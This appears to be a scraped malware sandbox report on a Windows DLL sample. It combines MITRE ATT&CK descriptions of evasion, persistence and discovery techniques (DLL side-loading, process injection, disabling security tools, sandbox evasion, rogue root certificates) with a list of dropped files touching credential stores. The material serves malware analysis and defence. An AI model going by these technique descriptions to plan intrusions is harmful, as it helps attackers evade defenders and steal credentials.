Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 26B1sczZ88.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

C:\Users\user\AppData\Local\Temp\SOFTWARE.LOG (copy)

C:\Users\user\AppData\Local\Temp\hrl97AF.tmp

C:\Users\user\AppData\Local\Temp\hrl97BF.tmp

C:\Users\user\AppData\Local\Temp\hrlA367.tmp

C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp

C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\1306eb95-1ab6-43bf-b773-ac80ff75f2fc

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred

C:\Windows\SysWOW64\zvhcfa.exe

C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\6cac72b7-3651-45b8-933a-942b0f95b1c5

C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Preferred

C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask

Windows Analysis Report
26B1sczZ88.dll

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre